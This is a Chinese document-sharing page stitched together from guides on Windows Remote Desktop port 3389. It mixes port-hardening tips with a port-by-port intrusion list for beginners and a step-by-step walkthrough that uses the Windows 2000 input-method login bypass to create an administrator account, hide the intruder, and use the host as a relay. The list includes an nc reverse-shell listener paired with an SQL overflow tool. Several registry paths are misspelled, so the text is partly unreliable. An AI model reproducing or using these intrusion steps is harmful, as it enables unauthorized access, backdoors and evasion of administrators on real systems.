最新3389端口入侵图解
- 格式:doc
- 大小:612.50 KB
- 文档页数:6
远程桌面端口3389如何修改(两步搞定)
Win系统如何修改远程桌面端口3389(两步搞定)为了网络安全,为了保护自己的隐私,我们需要将自己的电脑远程桌面端口3389进行修改,防止漏洞被黑客攻击。
漏洞的存在危害极大,小到文件被窃取,大到私密文件被曝光,银行账号密码被盗用。
下面来详细操作如何修改远程桌面3389端口。
1、运行,找到运行对话框,一种方法是:开始->附件->运行;另外一种是快捷键win+R组
合键,win就是键盘上的windows系统图标键。
2、Regedit,在对话框中输入regedit命令,然后回车。
3、打开注册表,输入命令后,会打开系统的注册表,左边是目录栏,右边是目录下的子菜
单或者目录内容。
4、修改端口1,按照路径打开,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control \Terminal
Server\Wds\rdpwd\Tds\tcp,双击文件,切换到十进制,默认是3389,将他修改为其他数字,比如8888,6666等等,确定。
5、修改端口2,按照路径,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Contr ol\Tenninal
Server\WinStations\RDP-T cp,修改PortNamber的值,方法同上。
6、关机重启,修改完之后,不是大功告成了,设置还没有生效,还差一步将电脑重新启动
就可以了。
7、验证,重启电脑之后,找另外一台电脑远程登录测试一下,这个时候远程桌面连接的地
址栏中就需要将自己主机的IP:端口号。
8、其他。
3389攻击原理
3389攻击原理是基于Windows终端服务(Terminal Services)的默认端口号3389进行的。
微软为了方便网络管理员远程管理及维护服务器而推出了这个服务,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上。
黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门账号,然后再开启对方的终端服务,这样,自己就可以随时使用终端服务来控制对方了。
这种主机的操作和控制就像操作自己的计算机一样方便。
由于终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。
这样的主机通常被称为“3389肉鸡”。
为了防范3389攻击,需要加强网络安全防护,定期更新操作系统和应用程序的安全补丁,限制不必要的远程访问和关闭不必要的端口和服务等措施。
同时,对于个人用户而言,也需要提高网络安全意识,不轻易打开未知来源的邮件和链接,及时更新防病毒软件等。
修改远程3389端口让网络连接更安全自Windows 2000开始,微软就提供一项终端服务(Terminal Server)这项服务可以将远程的桌面传递到本地。
通过该服务,可视化的远程管理可以非常方便的实现。
继Windows 2000之后,Windows XP也提供这项服务。
在Windows XP 中的Terminal Server Client程序比Windows 2000中的那个有了进一步的发展,许多功能都强大了许多。
Terminal Server 的默认端口是3389,所以很多了解Windows 的这个特性的人利用一些特殊的软件或者其他方法来扫描该端口。
发现该端口开放就可以实施入侵,这是非常危险的。
所以,建议大家改变Terminal Server的端口。
修改Terminal Server的默认端口的办法如下:一、服务器端的修改将下列两个注册表键中的 PortNumber 均改成自定义的端口即可:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ Terminal Server\Wds\Repwd\Tds\TcpHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ Terminal Server\WinStations\RDP-T cp二、客户端的修改打开mstsc.exe 窗口。
按“选项”按钮扩展窗口,将有“常规”、“显示”、“本地资源”、“运行”、“高级”五个选项卡。
根据需要填写各项后,再按“常规” 选项卡中的“另存为”按钮。
mstsc.exe 会将自定义连接配置保存为 .rdp 文件。
用文本编辑软件并添加如下一行:server port:i:×××× (××××服务器自定义的端口)。
也可以将中间项省去;直接写成server port:×××× 即可。
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。
(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。
(小榕的注入软件)。
5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。
7. 6129端口用DameWare6129.exe入侵。
8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。
第一步:隐藏自已的位置为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。
所谓“肉鸡”通常是指,HACK实现通过后门程序控制的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。
第二步:寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。
在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。
当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。
此时,攻击者们会使用一些扫描器工具,以试图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以及服务程序的版本等资料,为入侵作好充分的准备。
第三步:获取帐号和密码,登录主机攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。
这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。
当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。
第四步:获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。
他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。
此外,为了避免目标主机发现,清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
第五步:窃取网络资源和特权攻击者找到攻击目标后,会继续下一步的攻击。
如:下载敏感信息;窃取帐号密码、个人资料等。
三、网络攻击的原理和手法1、从扫描开始扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。
常见的扫描工具有X-scan、superscan、流光、X-port等。
3389原指计算机的3389端口, 一般被用来代指远程桌面,可以被修改。
它并不是一个木马程序,但如果不是必须的,建议关闭该服务。
原指计算机的3389端口因为它属于WINDOWS的远程桌面的初始端口[可以修改] 3389所以一般被用来代指远程桌面微软的远程桌面是3389原指计算机的3389端口, 一般被用来代指远程桌面,可以被修改。
它并不是一个木马程序,但如果不是必须的,建议关闭该服务。
原指计算机的3389端口因为它属于WINDOWS的远程桌面的初始端口[可以修改]3389所以一般被用来代指远程桌面微软的远程桌面是为了方便广大计算机管理员远程管理自己的计算机而设定的,但是只要有管理密码,3389可以为任何有管理密码的人提供服务……大部分黑客都喜欢在肉鸡上开个3389,因为3389是系统的正常服务,使用也非常方便。
它能达到灰鸽子这类的远程控制软件的一样的效果,最主要它是正常服务……3389很容易通过各种扫描工具(如superscan\x-scan等)得到,由于一些电脑使用者缺乏安全意识经常给administrator\new帐户密码留空,这样菜鸟们可以用mstsc.exe以GUI模式登陆别人的电脑.为防止别人利用3389登陆计算机最好给每个帐户设置密码或用防火墙关闭该端口.3389建议关闭.关闭3389端口的方法:首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。
如果不是必须的,建议关闭该服务。
win2000 server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。
win2000 pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。
最近3389端口入侵
前言:由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼的w2000 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
3389端口简介:WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身份验证机制而进入系统内部。
经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。
WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,用户在远程控制计算机时其功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。
因此这一漏洞使终端服务成为WIN2000的合法木马。
这次我们要用到的工具有:SUPERSCAN2.03 WIN2000终端服务客户端。
推荐使用流光4.6
下面我们来看看是怎么入侵的。
第一步:我们现在要做的是找到一台存在3389端口漏洞的主机,这是我们可爱的SUPERSCAN上场的时候了,
如果您对SUPERSCAN不太熟悉的话,你按照上图的配置就行了,在开始处填上你要扫描的IP地址段,结束处填上结束的IP地址段,如果你的网速和机器配置并不高的话,请不要扫描多个IP地址段。
第二步:假设我们现在已经得到一台存在3389漏洞的主机,现在我们要做的是进入到他的计算机中。
这里
我们就要用到上面所说到的终端客户端连接器了连接了。
如下图所示:
我们需要在服务器处填上我们刚才扫描得到的3389端口主机,屏幕区域:640*480 800*600 1024*768……这个是你连接上去以后在你机器上显示的分辨率,建议为:800*600。
在启用数据压缩处打上勾。
其他的就不用调整了!就使用默认了!点连接,我们就可以看到熟悉的WIN2000登陆界面了!
第三步:我们要做的是利用输入法漏洞为我们创建一个用户,并加入到administrators中去,或者将guset 激活。
建议激活guset,因为这样不容易被网管发现。
具体方法如下:
用终端连接器连接上几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址)。
用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。
用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),下图中的计算机依然存在3389漏洞,帮助我们还可以使用!:)如图一
打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。
此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。
比如,该系统安装在C盘上,就在空白栏中填入"c:\winnt\system32"。
当然也不一定对方的2000是安装在C盘,如果出错的话,你可以用file:///c:查看C盘的文件名,我就遇的很多用户装的是双操作系统,C装98,D装WIN2000,您可以根据具体的位置定义跳转URL,我们这里的主机2000是安装在D盘上的,我们填入"d:\winnt\system32"如图三。
然后按“确定”,就会在右边窗口出现图四所示,点显示文件,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。
现在我们要获得一个账号,成为系统的合法用户。
在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->d:\winnt\system32\net.exe后面空一格,填入"user guest active :yes"点“确定”。
这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user 用户名密码/add",创建一个新账号。
当然方法有很多种。
我们这里将带领各位建立一个用户名为WINADMIN的用户,找到NET这个文件右键---创建快捷方式----属性----然后填加用户。
上图中,我们建立了一个名字为WINADMIN的用户,然后就是改变WINADMIN的密码,用到的命令是:net user winadmin xxxx XXXX是你要设置的密码!运行后可能没有什么反映,但是实际上已经填加了这个用户了。
第五步:
上一步我们已经填加了WINADMIN这个用户,但是光有一个普通用户的权限是不够的,我们需要提升一下自己的权限,也就是把我们加到管理员组中去。
如下图所示:
再运行一下,呵呵!现在我们已经可以进入他的电脑了。
第六步----连接到对方计算机上去
我们使用终端连接器连接上去,填上你刚才建立的用户和密码,然后…………总之就象使用你的电脑一样!我们可以利用这台电脑为我们干很多事情,也可以当做跳板利用。
如果他安装了IIS的话,你还可以放上个江湖!(我觉得还是先通知网管)建议大家给在桌面上留下一个TXT文件,告诉他怎么修复,让他尽快补上漏洞!(又干了一件好事)
最后教大家一招,登陆进入以后local-machine->software->microsoft->winnt->currentversion->winlogon
DontDisplayLastUserName:1
修改注册表相应健值,这样网管就不会查到你了
防范方法:
1.最简单的一个防范方法就是删除帮助文件。
具体方法是在搜索中查找输入法的帮助文件,可以利用的有:PINTLGNT.CHM(微软拼音输入法),WINSP.CHM(双拼输入法帮助文件),WINZM.CHM(郑码输入法帮助文件),WINPY.CHM(全拼输入法帮助文件)WINIME.CHM(输入法操作指南)将以上文件全部删除
2./downl..._SP2_x86_CN.EXE安装输入法补丁
3.停止终端服。